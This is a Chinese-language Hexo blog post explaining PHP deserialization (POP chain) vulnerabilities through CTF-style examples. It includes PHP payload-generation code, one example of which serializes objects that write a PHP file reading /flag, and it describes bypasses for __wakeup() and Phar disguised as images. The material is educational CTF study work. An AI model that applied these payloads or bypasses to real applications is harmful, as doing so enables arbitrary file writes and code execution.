<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Popppppp | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="一、漏洞原理与触发逻辑反序列化漏洞的本质是通过unserialize()函数解析用户可控的序列化数据，触发对象中的魔术方法（如__destruct()、__wakeup()等），从而执行恶意操作。例如：​ 文件删除：若__destruct()中调用unlink($this-&gt;filename)，攻击者可通过控制filename属性删除系统文件。 ​代码执行：若__toString()或__i">
<meta property="og:type" content="article">
<meta property="og:title" content="Popppppp">
<meta property="og:url" content="http://example.com/2025/03/15/Popppppp/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="一、漏洞原理与触发逻辑反序列化漏洞的本质是通过unserialize()函数解析用户可控的序列化数据，触发对象中的魔术方法（如__destruct()、__wakeup()等），从而执行恶意操作。例如：​ 文件删除：若__destruct()中调用unlink($this-&gt;filename)，攻击者可通过控制filename属性删除系统文件。 ​代码执行：若__toString()或__i">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-03-15T10:59:56.000Z">
<meta property="article:modified_time" content="2025-03-15T11:21:17.214Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-Popppppp" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/03/15/Popppppp/" class="article-date">
  <time class="dt-published" datetime="2025-03-15T10:59:56.000Z" itemprop="datePublished">2025-03-15</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      Popppppp
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="一、漏洞原理与触发逻辑"><a href="#一、漏洞原理与触发逻辑" class="headerlink" title="一、漏洞原理与触发逻辑"></a>一、漏洞原理与触发逻辑</h1><h2 id="反序列化漏洞的本质是通过unserialize-函数解析用户可控的序列化数据，触发对象中的魔术方法（如-destruct-、-wakeup-等），从而执行恶意操作。例如："><a href="#反序列化漏洞的本质是通过unserialize-函数解析用户可控的序列化数据，触发对象中的魔术方法（如-destruct-、-wakeup-等），从而执行恶意操作。例如：" class="headerlink" title="反序列化漏洞的本质是通过unserialize()函数解析用户可控的序列化数据，触发对象中的魔术方法（如__destruct()、__wakeup()等），从而执行恶意操作。例如："></a>反序列化漏洞的本质是通过unserialize()函数解析用户可控的序列化数据，触发对象中的魔术方法（如__destruct()、__wakeup()等），从而执行恶意操作。例如：</h2><p>​ 文件删除：若__destruct()中调用unlink($this-&gt;filename)，攻击者可通过控制filename属性删除系统文件。</p>
<h2 id="​代码执行：若-toString-或-invoke-中调用eval-或system-，可通过构造对象链触发命令执行。"><a href="#​代码执行：若-toString-或-invoke-中调用eval-或system-，可通过构造对象链触发命令执行。" class="headerlink" title="​代码执行：若__toString()或__invoke()中调用eval()或system()，可通过构造对象链触发命令执行。"></a>​代码执行：若__toString()或__invoke()中调用eval()或system()，可通过构造对象链触发命令执行。</h2><h2 id="常用魔术方法"><a href="#常用魔术方法" class="headerlink" title="常用魔术方法:"></a>常用魔术方法:</h2><h4 id="wakeup-执行unserialize-时，先会调用这个函数"><a href="#wakeup-执行unserialize-时，先会调用这个函数" class="headerlink" title="__wakeup() &#x2F;&#x2F;执行unserialize()时，先会调用这个函数"></a>__wakeup() &#x2F;&#x2F;执行unserialize()时，先会调用这个函数</h4><h4 id="sleep-执行serialize-时，先会调用这个函数"><a href="#sleep-执行serialize-时，先会调用这个函数" class="headerlink" title="__sleep() &#x2F;&#x2F;执行serialize()时，先会调用这个函数"></a>__sleep() &#x2F;&#x2F;执行serialize()时，先会调用这个函数</h4><h4 id="destruct-对象被销毁时触发"><a href="#destruct-对象被销毁时触发" class="headerlink" title="__destruct() &#x2F;&#x2F;对象被销毁时触发"></a>__destruct() &#x2F;&#x2F;对象被销毁时触发</h4><h4 id="call-在对象上下文中调用不可访问的方法时触发"><a href="#call-在对象上下文中调用不可访问的方法时触发" class="headerlink" title="__call() &#x2F;&#x2F;在对象上下文中调用不可访问的方法时触发"></a>__call() &#x2F;&#x2F;在对象上下文中调用不可访问的方法时触发</h4><h4 id="callStatic-在静态上下文中调用不可访问的方法时触发"><a href="#callStatic-在静态上下文中调用不可访问的方法时触发" class="headerlink" title="__callStatic() &#x2F;&#x2F;在静态上下文中调用不可访问的方法时触发"></a>__callStatic() &#x2F;&#x2F;在静态上下文中调用不可访问的方法时触发</h4><h4 id="get-用于从不可访问的属性读取数据或者不存在这个键都会调用此方法"><a href="#get-用于从不可访问的属性读取数据或者不存在这个键都会调用此方法" class="headerlink" title="__get() &#x2F;&#x2F;用于从不可访问的属性读取数据或者不存在这个键都会调用此方法"></a>__get() &#x2F;&#x2F;用于从不可访问的属性读取数据或者不存在这个键都会调用此方法</h4><h4 id="set-用于将数据写入不可访问的属性"><a href="#set-用于将数据写入不可访问的属性" class="headerlink" title="__set() &#x2F;&#x2F;用于将数据写入不可访问的属性"></a>__set() &#x2F;&#x2F;用于将数据写入不可访问的属性</h4><h4 id="isset-在不可访问的属性上调用isset-或empty-触发"><a href="#isset-在不可访问的属性上调用isset-或empty-触发" class="headerlink" title="__isset() &#x2F;&#x2F;在不可访问的属性上调用isset()或empty()触发"></a>__isset() &#x2F;&#x2F;在不可访问的属性上调用isset()或empty()触发</h4><h4 id="unset-在不可访问的属性上使用unset-时触发"><a href="#unset-在不可访问的属性上使用unset-时触发" class="headerlink" title="__unset() &#x2F;&#x2F;在不可访问的属性上使用unset()时触发"></a>__unset() &#x2F;&#x2F;在不可访问的属性上使用unset()时触发</h4><h4 id="toString-把对象当作字符串使用时触发"><a href="#toString-把对象当作字符串使用时触发" class="headerlink" title="__toString() &#x2F;&#x2F;把对象当作字符串使用时触发"></a>__toString() &#x2F;&#x2F;把对象当作字符串使用时触发</h4><h4 id="invoke-当尝试将对象调用为函数时触发"><a href="#invoke-当尝试将对象调用为函数时触发" class="headerlink" title="__invoke() &#x2F;&#x2F;当尝试将对象调用为函数时触发"></a>__invoke() &#x2F;&#x2F;当尝试将对象调用为函数时触发</h4><h1 id="二、典型POP链构造步骤（以CTF赛题为例）"><a href="#二、典型POP链构造步骤（以CTF赛题为例）" class="headerlink" title="二、典型POP链构造步骤（以CTF赛题为例）"></a>二、典型POP链构造步骤（以CTF赛题为例）</h1><h2 id="​起点选择"><a href="#​起点选择" class="headerlink" title="​起点选择"></a>​起点选择</h2><h4 id="通常从-destruct-或-wakeup-开始。例如："><a href="#通常从-destruct-或-wakeup-开始。例如：" class="headerlink" title="通常从__destruct()或__wakeup()开始。例如："></a>通常从__destruct()或__wakeup()开始。例如：</h4><p>php<br>class Start {<br>    public $mod1;<br>    public function __destruct() {<br>        $this-&gt;mod1-&gt;test1(); &#x2F;&#x2F; 触发下一层方法调用<br>    }<br>}</p>
<h2 id="​方法串联"><a href="#​方法串联" class="headerlink" title="​方法串联"></a>​方法串联</h2><h4 id="通过属性传递对象链，逐步触发魔术方法："><a href="#通过属性传递对象链，逐步触发魔术方法：" class="headerlink" title="通过属性传递对象链，逐步触发魔术方法："></a>通过属性传递对象链，逐步触发魔术方法：</h4><h4 id="​Call-test1-调用不存在的test2-，触发Funct-call-。"><a href="#​Call-test1-调用不存在的test2-，触发Funct-call-。" class="headerlink" title="​Call::test1() 调用不存在的test2()，触发Funct::__call()。"></a>​Call::test1() 调用不存在的test2()，触发Funct::__call()。</h4><h4 id="​Funct-call-将-mod1作为函数调用，触发Func-invoke-。"><a href="#​Funct-call-将-mod1作为函数调用，触发Func-invoke-。" class="headerlink" title="​Funct::__call() 将$mod1作为函数调用，触发Func::__invoke()。"></a>​Funct::__call() 将$mod1作为函数调用，触发Func::__invoke()。</h4><h4 id="​Func-invoke-拼接字符串，触发String1-toString-。"><a href="#​Func-invoke-拼接字符串，触发String1-toString-。" class="headerlink" title="​Func::__invoke() 拼接字符串，触发String1::__toString()。"></a>​Func::__invoke() 拼接字符串，触发String1::__toString()。</h4><h4 id="​String1-toString-调用GetFlag-get-flag-获取Flag"><a href="#​String1-toString-调用GetFlag-get-flag-获取Flag" class="headerlink" title="​String1::__toString() 调用GetFlag::get_flag()获取Flag"></a>​String1::__toString() 调用GetFlag::get_flag()获取Flag</h4><h2 id="最终利用"><a href="#最终利用" class="headerlink" title="最终利用"></a>最终利用</h2><h4 id="通过动态调用链实现代码执行或敏感操作："><a href="#通过动态调用链实现代码执行或敏感操作：" class="headerlink" title="通过动态调用链实现代码执行或敏感操作："></a>通过动态调用链实现代码执行或敏感操作：</h4><h4 id="构造Payload示例"><a href="#构造Payload示例" class="headerlink" title="构造Payload示例"></a>构造Payload示例</h4><p>$start &#x3D; new Start();<br>$start-&gt;mod1 &#x3D; new Call();<br>$start-&gt;mod1-&gt;mod1 &#x3D; new Funct();<br>$start-&gt;mod1-&gt;mod1-&gt;mod1 &#x3D; new Func();<br>$start-&gt;mod1-&gt;mod1-&gt;mod1-&gt;mod1 &#x3D; new String1();<br>$start-&gt;mod1-&gt;mod1-&gt;mod1-&gt;mod1-&gt;str1 &#x3D; new GetFlag();<br>echo serialize($start);</p>
<h1 id="三、绕过技巧与防御对抗"><a href="#三、绕过技巧与防御对抗" class="headerlink" title="三、绕过技巧与防御对抗"></a>三、绕过技巧与防御对抗</h1><h2 id="​绕过-wakeup"><a href="#​绕过-wakeup" class="headerlink" title="​绕过__wakeup()"></a>​绕过__wakeup()</h2><h4 id="修改序列化字符串中的属性数量（如O-1-”A”-2改为O-1-”A”-3），跳过-wakeup-执行。"><a href="#修改序列化字符串中的属性数量（如O-1-”A”-2改为O-1-”A”-3），跳过-wakeup-执行。" class="headerlink" title="修改序列化字符串中的属性数量（如O:1:”A”:2改为O:1:”A”:3），跳过__wakeup()执行。"></a>修改序列化字符串中的属性数量（如O:1:”A”:2改为O:1:”A”:3），跳过__wakeup()执行。</h4><h2 id="​Phar协议利用"><a href="#​Phar协议利用" class="headerlink" title="​Phar协议利用"></a>​Phar协议利用</h2><h4 id="通过phar-协议触发反序列化，无需直接调用unserialize"><a href="#通过phar-协议触发反序列化，无需直接调用unserialize" class="headerlink" title="通过phar:&#x2F;&#x2F;协议触发反序列化，无需直接调用unserialize()"></a>通过phar:&#x2F;&#x2F;协议触发反序列化，无需直接调用unserialize()</h4><h4 id="​构造Phar文件：伪装为图片或其他格式绕过上传限制。"><a href="#​构造Phar文件：伪装为图片或其他格式绕过上传限制。" class="headerlink" title="​构造Phar文件：伪装为图片或其他格式绕过上传限制。"></a>​构造Phar文件：伪装为图片或其他格式绕过上传限制。</h4><h2 id="​触发条件：调用file-exists-或file-get-contents-等函数。"><a href="#​触发条件：调用file-exists-或file-get-contents-等函数。" class="headerlink" title="​触发条件：调用file_exists()或file_get_contents()等函数。"></a>​触发条件：调用file_exists()或file_get_contents()等函数。</h2><h2 id="​属性类型混淆"><a href="#​属性类型混淆" class="headerlink" title="​属性类型混淆"></a>​属性类型混淆</h2><h4 id="在PHP-7-1-中，protected-private属性的序列化前缀（-x00-）可省略，直接构造无前缀的序列化字符串实现利用。"><a href="#在PHP-7-1-中，protected-private属性的序列化前缀（-x00-）可省略，直接构造无前缀的序列化字符串实现利用。" class="headerlink" title="在PHP 7.1+中，protected&#x2F;private属性的序列化前缀（\x00*）可省略，直接构造无前缀的序列化字符串实现利用。"></a>在PHP 7.1+中，protected&#x2F;private属性的序列化前缀（\x00*）可省略，直接构造无前缀的序列化字符串实现利用。</h4><h1 id="题目示例"><a href="#题目示例" class="headerlink" title="题目示例"></a>题目示例</h1><h2 id="某CTF题目中，反序列化入口为unserialize-GET-‘data’-，要求通过POP链获取-flag文件内容。"><a href="#某CTF题目中，反序列化入口为unserialize-GET-‘data’-，要求通过POP链获取-flag文件内容。" class="headerlink" title="某CTF题目中，反序列化入口为unserialize($_GET[‘data’])，要求通过POP链获取&#x2F;flag文件内容。"></a>某CTF题目中，反序列化入口为unserialize($_GET[‘data’])，要求通过POP链获取&#x2F;flag文件内容。</h2><h3 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h3><h4 id="​分析类结构"><a href="#​分析类结构" class="headerlink" title="​分析类结构"></a>​分析类结构</h4><h4 id="识别包含魔术方法的类（如FileHandler、Logger），寻找可串联的方法调用路径。"><a href="#识别包含魔术方法的类（如FileHandler、Logger），寻找可串联的方法调用路径。" class="headerlink" title="识别包含魔术方法的类（如FileHandler、Logger），寻找可串联的方法调用路径。"></a>识别包含魔术方法的类（如FileHandler、Logger），寻找可串联的方法调用路径。</h4><h3 id="​构造POP链"><a href="#​构造POP链" class="headerlink" title="​构造POP链"></a>​构造POP链</h3><h4 id="​起点：FileHandler-destruct-调用-this-log-save-。"><a href="#​起点：FileHandler-destruct-调用-this-log-save-。" class="headerlink" title="​起点：FileHandler::__destruct()调用$this-&gt;log-&gt;save()。"></a>​起点：FileHandler::__destruct()调用$this-&gt;log-&gt;save()。</h4><h4 id="​中间层：Logger-save-触发-this-writer-write-。"><a href="#​中间层：Logger-save-触发-this-writer-write-。" class="headerlink" title="​中间层：Logger::save()触发$this-&gt;writer-&gt;write()。"></a>​中间层：Logger::save()触发$this-&gt;writer-&gt;write()。</h4><h4 id="​终点：Writer-write-调用file-put-contents-this-path-this-content-。"><a href="#​终点：Writer-write-调用file-put-contents-this-path-this-content-。" class="headerlink" title="​终点：Writer::write()调用file_put_contents($this-&gt;path, $this-&gt;content)。"></a>​终点：Writer::write()调用file_put_contents($this-&gt;path, $this-&gt;content)。</h4><h4 id="​Payload生成"><a href="#​Payload生成" class="headerlink" title="​Payload生成"></a>​Payload生成</h4><p>php<br>class FileHandler {<br>    public $log;<br>    public function __construct() {<br>        $this-&gt;log &#x3D; new Logger();<br>    }<br>}<br>class Logger {<br>    public $writer;<br>    public function __construct() {<br>        $this-&gt;writer &#x3D; new Writer();<br>    }<br>}<br>class Writer {<br>    public $path &#x3D; ‘&#x2F;flag’;<br>    public $content &#x3D; ‘<?php echo file_get_contents("/flag"); ?>‘;<br>}<br>echo urlencode(serialize(new FileHandler()));</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/03/15/Popppppp/" data-id="cm8a49bo300013svk9b9obf66" data-title="Popppppp" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2025/02/18/upload-labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">upload-labs靶场通关</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%89%8D%E7%AB%AF/">web前端</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/hexo/" rel="tag">hexo</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql-labs%E9%9D%B6%E5%9C%BA/" rel="tag">sql-labs靶场</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/upload-labs%E9%9D%B6%E5%9C%BA/" rel="tag">upload-labs靶场</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2/" rel="tag">博客</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/hexo/" style="font-size: 10px;">hexo</a> <a href="/tags/sql-labs%E9%9D%B6%E5%9C%BA/" style="font-size: 10px;">sql-labs靶场</a> <a href="/tags/upload-labs%E9%9D%B6%E5%9C%BA/" style="font-size: 10px;">upload-labs靶场</a> <a href="/tags/%E5%8D%9A%E5%AE%A2/" style="font-size: 10px;">博客</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/03/">March 2025</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/02/">February 2025</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/10/">October 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/03/15/Popppppp/">Popppppp</a>
          </li>
        
          <li>
            <a href="/2025/02/18/upload-labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/">upload-labs靶场通关</a>
          </li>
        
          <li>
            <a href="/2025/02/18/sql-labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/">sql-labs靶场通关</a>
          </li>
        
          <li>
            <a href="/2024/10/26/%E8%99%9A%E6%8B%9F%E6%9C%BA%E6%90%AD%E5%BB%BA/">虚拟机搭建</a>
          </li>
        
          <li>
            <a href="/2024/10/26/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/">博客搭建</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>